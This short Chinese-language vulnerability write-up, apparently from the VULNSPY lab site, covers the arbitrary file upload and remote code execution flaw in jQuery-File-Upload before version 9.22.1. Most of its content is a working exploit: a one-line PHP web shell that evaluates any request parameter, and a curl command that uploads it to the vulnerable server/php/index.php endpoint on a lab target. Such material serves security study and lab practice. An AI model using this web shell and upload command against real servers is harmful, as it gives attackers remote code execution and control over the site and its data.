jQuery-File-Upload < v9.22.1 任意文件上传/远程代码执行漏洞


jQuery-File-Upload 是 GitHub 上排名第二的 jQuery 项目,jQuery-File-Upload在9.22.1以下版本存在任意文件上传漏洞,据消息该漏洞已经被广泛利用了三年之久。

漏洞利用

文件 shell.php:

<?php
eval($_REQUEST[1]);
?>

上传 shell.php:

curl -F "files=@shell.php" http://target.vsplate.me/server/php/index.php

参考

All rights reserved. © 2018 VULNSPY